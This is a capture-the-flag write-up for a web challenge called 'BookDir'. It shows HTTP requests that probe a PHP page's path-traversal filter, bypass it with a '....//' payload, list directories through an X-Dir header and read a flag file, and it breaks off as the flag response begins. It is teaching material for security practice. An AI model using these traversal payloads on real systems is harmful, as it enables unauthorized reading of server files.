Rating: 5.0
# ▼▼▼BookDir (Web:125pts)▼▼▼
**This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)**
```
89.38.210.129:8012
```
---
**【Identify the vulnerability and filter】**
**(1)Normal response**
```
GET /books/booklist.php?f=Beloved HTTP/1.1
GET /books/booklist.php?f=./Beloved HTTP/1.1
GET /books/booklist.php?f=./../Beloved HTTP/1.1
GET /books/booklist.php?f=././Be../loved HTTP/1.1
GET /books/booklist.php?f=./../Beloved../ HTTP/1.1
GET /books/booklist.php?f=/////////Beloved HTTP/1.1
GET /books/booklist.php?f=..//Beloved HTTP/1.1
```
↓
```
"\"124 was spiteful. Full of baby's venom. The women in the house knew it and so did the children.\"\n"
```
---
**(2)Different from normal response**
```
GET /books/booklist.php?f=..././Beloved HTTP/1.1
GET /books/booklist.php?f=..Beloved HTTP/1.1
GET /books/booklist.php?f=B/eloved HTTP/1.1
GET /books/booklist.php?f=B./eloved HTTP/1.1
```
↓
false
---
Conclusion
↓
・LFI vulnerability exists!!
・Behavior of filter
`../` will be deleted
`..` will not deleted
`./` will not deleted
`/` will not deleted
---
**【Get source code】**
GET /books/booklist.php?f=`....//booklist.php`
↓
```
" $file];
}
echo json_encode($files);
}
"
```
↓
In the `X-Dir header`, you can get the file list of the directory
---
**【Get file list】**
**(1)Get the file list of `./`**
↓
```
GET /books/booklist.php HTTP/1.1
Host: 89.38.210.129:8012
X-Dir: ./
```
↓
```
[{"name":"Beloved"},{"name":"Catch-22"},{"name":"Lolita"},{"name":"Nineteen Eighty-Four"},{"name":"The Catcher in the Rye"},{"name":"The Grapes of Wrath"},{"name":"The Great Gatsby"},{"name":"The Sound and the Fury"},{"name":"Ulysses"}]
```
---
**(2)Get the file list of `../`**
```
GET /books/booklist.php HTTP/1.1
Host: 89.38.210.129:8012
X-Dir: ../
```
↓
```
[{"name":"4o4_fl4g_n0t_f0und.php"},{"name":"booklist.php"},{"name":"books.js"},{"name":"css"},{"name":"index.html"},{"name":"list"},{"name":"vendor"}]
```
---
**【Get a flag file】**
```
GET /books/booklist.php?f=....//4o4_fl4g_n0t_f0und.php HTTP/1.1
```
↓
```
"
Legend
